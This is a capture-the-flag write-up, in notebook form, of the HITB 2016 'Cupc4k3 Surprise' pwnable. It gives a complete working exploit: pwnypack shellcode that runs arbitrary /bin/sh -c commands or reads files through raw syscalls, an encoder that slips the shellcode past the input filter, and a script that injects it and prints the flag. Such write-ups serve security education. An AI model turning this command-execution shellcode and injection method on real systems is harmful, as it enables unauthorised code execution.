## Introduction

This is a write-up of the pwnable challenge (Cupc4k3 Surprise) of the HITB 2016 Teaser CTF. Here's the original description of the challenge:

> Pastries have been the driving force in culinary innovation for centuries. And no pastry type
> has pushed the boundries further or faster than the iconic Cupcake. Today, you will show us
> your skill and creativity by creating a truely orginal Cupcake, using nothing but the ingredients
> in our specially prepared Cupcake Bakery. You can find the Cupcake Bakery at 52.17.31.229:31337.
> We will even give you a layout of the bakery.

Download the [binary](910abf341053d25831ecb465b7ddf738). TL;DR: download the [exploit](pwnc4k3.py).

Let's start by some python 2/3 compatibility preamble and defining a way to connect to the bakery. Adjust as required.

In [1]:
from __future__ import print_function
import six


def connection_factory(echo=False):
    # Connect to the bakery (no longer available):
    # return Flow.connect_tcp('52.17.31.229', 31337, echo=echo)

    # If you want to use the local executable, use:
    return Flow.execute('./910abf341053d25831ecb465b7ddf738', echo=echo)

    # Or, via ssh (I've got a virtual machine set up for this):
    # return Flow.execute_ssh('./910abf341053d25831ecb465b7ddf738', '127.0.0.1', 2224, echo=echo)

Let's see what this cupcake is made of.

In [2]:
%checksec 910abf341053d25831ecb465b7ddf738

RELRO    CANARY  NX   PIE  RPATH  RUNPATH  FORTIFIED  PATH
Partial  Yes     Yes  No   No     No           0/4/4  910abf341053d25831ecb465b7ddf738


Let's prepare our environment. We let pwnypack assume the target of the executable and create a shellcode environment for 64bit Linux.

In [3]:
target.assume(ELF('910abf341053d25831ecb465b7ddf738'))

Next, we'll need some code to execute on the remote machine. Using pwnypack's shellcode engine (the 64bit Linux flavor) we can easily assemble shellcode that allows us to run any command by invoking /bin/sh -c _command_.

In [4]:
@sc.LinuxX86_64Mutable.translate()
def build_shellcode_shell(system_cmd):
    sys_execve(
        u'/bin/sh',
        [u'/bin/sh', u'-c', system_cmd, None],
        None
    )

Or, to make things a bit more interesting on the shellcode side, let's create some shellcode that prints the content of a file using only syscalls.

In [5]:
@sc.LinuxX86_64Mutable.translate()
def build_shellcode_cat(path):
    buf = alloc_buffer(64)
    R13 = sys_open(path, 0, 0)
    R14 = sys_read(R13, buf, buf.length)
    sys_write(1, buf, R14)
    sys_close(R13)
    sys_exit(0)

# You could also write:
@sc.LinuxX86_64Mutable.translate()
def build_shellcode_cat_1(path):
    buf = alloc_buffer(64)
    R13 = sys_open(path, 0, 0)
    sys_write(1, buf, sys_read(R13, buf, buf.length))
    sys_close(R13)
    sys_exit(0)

# Or, since there's no real need to close the file:
@sc.LinuxX86_64Mutable.translate()
def build_shellcode_cat_2(path):
    buf = alloc_buffer(64)
    sys_write(1, buf, sys_read(sys_open(path, 0, 0), buf, buf.length))
    sys_exit(0)

As the cupcake engine adds the random value and each byte of the ingredient, we can create a function that encodes a byte by subtracting the random value and the ascii indices of the ingredient itself. Since we can't send NUL bytes or carriage return characters and other control characters look really strange we use a special encoding for those.

In [6]:
def encode_byte(random_value, ch):
    v = (ch - random_value - sum(map(ord, u'EGG'))) & 0xff
    if v == 0:
        return b'EGG'
    elif v < 32:
        return b'EGG' + P8(128) + P8(v + 128)
    else:
        return b'EGG' + P8(v)

Next, we create a function that builds shellcode to execute a given command (it calls /bin/sh -c {command}), reads the oven temperature and determines the random value that is used. It then adds an ingredient for each byte of shellcode.

In [7]:
def bake(system_cmd, debug=False):
    if system_cmd:
        shellcode = build_shellcode_shell(system_cmd)
    else:
        shellcode = build_shellcode_cat(u'YOU_WANT_THIS_ONE')

    if debug:
        print()
        print('Assembled shellcode length:', len(shellcode))
        print(repr(shellcode))

    f = connection_factory()

    f.until(b'0v3n w4rm3d up to ')
    random_value = int(f.readline().split(b' ')[0]) // 0x1337

    f.until(b'add ingredient> ')
    for ch in six.iterbytes(shellcode):
        f.writeline(encode_byte(random_value, ch))
        f.until(b'add ingredient> ')

    if debug:
        print()
        print('Output:')
    f.writeline(b'BAKE')
    f.read_eof(echo=True)

And now, let's bake a cupcake!

In [8]:
bake(u'cat YOU_WANT_THIS_ONE', True)


Assembled shellcode length: 72
'H\x8d- \x00\x00\x00H1\xd2H1\xc0PUH\x8dE\x16PH\x8dE\x19PH\x89\xe6H\x8d}\x19\xb8;\x00\x00\x00\x0f\x05cat YOU_WANT_THIS_ONE\x00-c\x00/bin/sh\x00'

Output:
hitb{BLABLABLA}


In [9]:
bake(None, True)


Assembled shellcode length: 103
'H\x8d-N\x00\x00\x00H1\xd2H1\xf6H\x89\xef\xb8\x02\x00\x00\x00\x0f\x05I\x89\xc5\xba@\x00\x00\x00H\x8du\x12L\x89\xefH1\xc0\x0f\x05I\x89\xc6L\x89\xf2H\x8du\x12\xbf\x01\x00\x00\x00\xb8\x01\x00\x00\x00\x0f\x05L\x89\xef\xb8\x03\x00\x00\x00\x0f\x05H1\xff\xb8<\x00\x00\x00\x0f\x05YOU_WANT_THIS_ONE\x00'

Output:
hitb{BLABLABLA}
